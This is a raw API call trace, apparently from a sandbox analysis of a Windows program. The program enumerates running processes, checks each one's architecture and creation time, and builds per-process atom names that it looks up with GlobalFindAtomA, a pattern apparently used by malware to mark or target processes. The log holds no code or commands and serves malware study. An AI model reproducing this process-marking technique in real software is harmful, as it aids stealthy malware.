	[0127.007] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.007] CloseHandle (hObject=0x2dc) returned 1
	[0127.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.007] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.008] CloseHandle (hObject=0x2dc) returned 1
	[0127.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.008] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.008] CloseHandle (hObject=0x2dc) returned 1
	[0127.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.008] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.008] CloseHandle (hObject=0x2dc) returned 1
	[0127.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.009] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.009] CloseHandle (hObject=0x2dc) returned 1
	[0127.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.009] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.009] CloseHandle (hObject=0x2dc) returned 1
	[0127.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.010] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.010] CloseHandle (hObject=0x2dc) returned 1
	[0127.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.010] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.010] CloseHandle (hObject=0x2dc) returned 1
	[0127.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.010] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.011] CloseHandle (hObject=0x2dc) returned 1
	[0127.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.011] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.011] CloseHandle (hObject=0x2dc) returned 1
	[0127.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.011] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.011] CloseHandle (hObject=0x2dc) returned 1
	[0127.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.012] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.012] CloseHandle (hObject=0x2dc) returned 1
	[0127.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.012] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.012] CloseHandle (hObject=0x2dc) returned 1
	[0127.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.012] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.012] CloseHandle (hObject=0x2dc) returned 1
	[0127.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.013] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.013] CloseHandle (hObject=0x2dc) returned 1
	[0127.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.013] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.013] CloseHandle (hObject=0x2dc) returned 1
	[0127.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.014] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.014] CloseHandle (hObject=0x2dc) returned 1
	[0127.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.014] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.014] CloseHandle (hObject=0x2dc) returned 1
	[0127.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.015] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.015] CloseHandle (hObject=0x2dc) returned 1
	[0127.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.015] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.015] CloseHandle (hObject=0x2dc) returned 1
	[0127.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.015] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.015] CloseHandle (hObject=0x2dc) returned 1
	[0127.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.016] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.016] CloseHandle (hObject=0x2dc) returned 1
	[0127.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.016] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.016] CloseHandle (hObject=0x2dc) returned 1
	[0127.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.016] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.016] CloseHandle (hObject=0x2dc) returned 1
	[0127.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.017] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.017] CloseHandle (hObject=0x2dc) returned 1
	[0127.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.017] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.017] CloseHandle (hObject=0x2dc) returned 1
	[0127.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.018] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.018] CloseHandle (hObject=0x2dc) returned 1
	[0127.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.018] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.018] CloseHandle (hObject=0x2dc) returned 1
	[0127.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.018] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.018] CloseHandle (hObject=0x2dc) returned 1
	[0127.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.019] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.019] CloseHandle (hObject=0x2dc) returned 1
	[0127.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.019] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetLastError () returned 0x5
	[0127.020] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.021] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0127.021] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.021] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.022] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetLastError () returned 0x5
	[0127.023] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.023] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.024] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.024] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.024] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.024] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.024] CloseHandle (hObject=0x2dc) returned 1
	[0127.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.025] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.025] CloseHandle (hObject=0x2dc) returned 1
	[0127.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.025] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.025] CloseHandle (hObject=0x2dc) returned 1
	[0127.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.025] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.025] CloseHandle (hObject=0x2dc) returned 1
	[0127.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.026] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.026] CloseHandle (hObject=0x2dc) returned 1
	[0127.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.026] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.026] CloseHandle (hObject=0x2dc) returned 1
	[0127.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
